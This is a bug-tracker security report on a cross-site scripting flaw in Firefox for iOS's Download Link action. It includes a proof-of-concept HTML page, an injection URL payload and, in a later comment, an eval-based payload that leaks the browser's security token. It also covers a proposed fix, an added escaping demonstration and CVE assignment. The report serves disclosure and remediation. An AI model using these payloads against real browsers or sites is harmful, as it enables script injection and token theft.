XSS from booby-trapped link on Firefox iOS Download Link Action
Categories: Firefox for iOS :: General, defect, P1
Tracking: fxios 26
People: Reporter: vinothsparrow, Assigned: garvan
Keywords: csectype-sop, reporter-external, sec-moderate
Whiteboard: [reporter-external] [client-bounty-form] [verif?] [user interaction keeps it from being sec-high]
Attachments: 2 files
Firefox Version: v24.1
OS: iOS 13.3.1
Issue: Universal XSS on Firefox iOS Download link Action
Description:
A Firefox iOS user clicks the download link in the hyperlink options and XSS is triggered on the current URL when the hyperlink is in the format https://anydomain/','123');alert(document.domain);//
Sample attack scenario:
- Attacker links https://attacker.com/','123');alert( in google.com index
- Victim clicks the download link on Firefox iOS
- XSS is executed in the victim's google.com domain
Steps to reproduce:
- Open https://vinothkumar.tech/firefox-ios in your iOS Firefox browser.
- Hold the link until the preview popup appears.
- Click Download Link.
- XSS is triggered.
The unescaped URL is appended to the JavaScript when the download action is clicked:
// Vulnerable: url.absoluteString is interpolated verbatim into a single-quoted JS string literal
currentTab.webView?.evaluateJavaScript("window.__firefox__.download('\(url.absoluteString)', '\(UserScriptManager.securityToken)')")
Fix:
// Proposed fix: percent-encode single quotes so the URL cannot close the literal
let safeUrl = url.absoluteString.replacingOccurrences(of: "'", with: "%27")
currentTab.webView?.evaluateJavaScript("window.__firefox__.download('\(safeUrl)', '\(UserScriptManager.securityToken)')")
Youtube Unlisted Video: https://youtu.be/zkVVolyCrt0
POC:
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>Firefox Universal Download Link XSS POC</title>
</head>
<body>
<a href="http://vinothsparrow.herokuapp.com/','123');alert(document.domain);//">Download Link in Firefox</a><br><br>
</body>
</html>
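The root cause above is a string-concatenation injection: a URL (data) is pasted into JavaScript source (code) that evaluateJavaScript then runs in the page. The following is an added example, not code from the report or from the Firefox iOS code base. It models the download action's snippet building in Node: a constructed sandbox stands in for the page (window.__firefox__.download, alert and document are stand-ins; the token is a placeholder), the vulnerable interpolation is shown next to a hardened form that emits the URL as a proper JavaScript string literal, and both are run against the URL shape from the report to show what the page observes in each case.

```javascript
// Added example; models the download action's string building, not Firefox iOS code.
// window.__firefox__.download, alert, document and the token are stand-ins constructed
// here so the built snippet can be evaluated offline in Node.

// Stand-in for the page the snippet is evaluated in.
function makeSandbox() {
  const calls = [];            // (url, token) pairs received by the download handler
  let alerted = false;         // flips to true if injected code reaches alert()
  const win = {
    __firefox__: { download: (url, token) => { calls.push([url, token]); } },
  };
  const alert = () => { alerted = true; };
  const document = { domain: 'example.test' };
  // Evaluate the snippet with window/alert/document bound, the way evaluateJavaScript
  // runs it inside the WKWebView's page context.
  const run = (snippet) =>
    new Function('window', 'alert', 'document', snippet)(win, alert, document);
  return { run, calls, alerted: () => alerted };
}

// Vulnerable construction: the URL is interpolated into a single-quoted literal,
// so a quote inside the URL ends the literal and the remainder is parsed as code.
function buildUnsafe(url, token) {
  return `window.__firefox__.download('${url}', '${token}')`;
}

// Hardened construction: JSON.stringify produces a valid JavaScript string literal,
// escaping quotes, backslashes and control characters, so the URL stays data.
function buildSafe(url, token) {
  return `window.__firefox__.download(${JSON.stringify(url)}, ${JSON.stringify(token)})`;
}

// Evaluate one construction against a URL and report what the page observed:
// which arguments reached the download handler, whether alert() ran, and
// whether the snippet failed to parse at all.
function evaluate(builder, url, token) {
  const box = makeSandbox();
  let threw = false;
  try { box.run(builder(url, token)); } catch (e) { threw = true; }
  return { calls: box.calls, alerted: box.alerted(), threw };
}

// Constructed inputs: the URL shape from the report and a placeholder token.
const PAYLOAD_URL = "https://anydomain/','123');alert(document.domain);//";
const TOKEN = 'TOKEN-PLACEHOLDER';

console.log('unsafe:', evaluate(buildUnsafe, PAYLOAD_URL, TOKEN));
console.log('safe:  ', evaluate(buildSafe, PAYLOAD_URL, TOKEN));
```

With the unsafe builder the download handler receives ('https://anydomain/', '123') and alert() runs; with the safe builder it receives the whole URL and the real token as two plain arguments and nothing else executes. Replacing only the single quote, as the report's fix does, closes this particular breakout; encoding the entire value as a string literal also handles backslashes and other characters that can alter how a literal is parsed, and is the general shape of a fix whenever attacker-controlled text has to be embedded in code that will be evaluated.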
Comment 1•5 years ago
Garvan, can you help prioritize this? I don't have an iOS device but the write-up in comment #0 looks pretty serious.
Comment 2•5 years ago (Reporter)
Also, with this issue the attacker can get the security token value in the XSS. Using the security token, the attacker can trigger webkit.messageHandlers events (loginsManagerMessageHandler, printHandler, sessionRestoreHelper, etc.).
Payload to get security token:
<a href="https://domain/','123');a=eval(decodeURIComponent('(function(a,b){alert(b);})'));a('1">XSS</a>
The above payload will alert the security token.
Landed for v25 of Firefox iOS, the next release.
Comment 5•5 years ago
It's not exactly a "Universal" XSS -- the attacker can't pick any arbitrary victim site. The target site has to be one where users can add links (which is still a large number of popular sites, especially social ones) and a context where the victim will want to download the link rather than click on it to open.
CVE for v25 was missed for this bug, assigning it to v26 in order to get picked up by the release notes process.
The bug https://bugzilla.mozilla.org/show_bug.cgi?id=1632387 is the same type of attack, leaking the token, and did have a sec advisory for v25.
Can you add a CVE to this bug? Thanks
$ ./ios_advisories.py 26
Generating advisories for Firefox for iOS Version 26
1631739 is missing a CVE identified....
Comment 9•5 years ago
Use CVE-2020-12404 for this one.